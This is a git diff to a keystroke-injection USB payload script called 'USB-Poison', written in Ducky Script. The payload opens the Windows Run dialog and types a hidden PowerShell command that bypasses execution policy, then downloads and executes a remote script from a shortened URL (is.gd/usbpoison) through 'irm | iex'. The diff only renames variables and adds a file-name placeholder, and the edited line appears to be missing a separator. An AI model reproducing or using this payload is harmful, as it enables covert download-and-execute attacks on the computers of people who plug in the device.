diff --git a/USB-Poison/USB-Poison.txt b/USB-Poison/USB-Poison.txt index c57ac92..ad2cbad 100644 --- a/USB-Poison/USB-Poison.txt +++ b/USB-Poison/USB-Poison.txt @@ -11,6 +11,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $url = 'YOUR_FILE_URL_HERE'; irm is.gd/usbpoison | iex +STRING powershell -NoP -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' irm is.gd/usbpoison | iex ENTER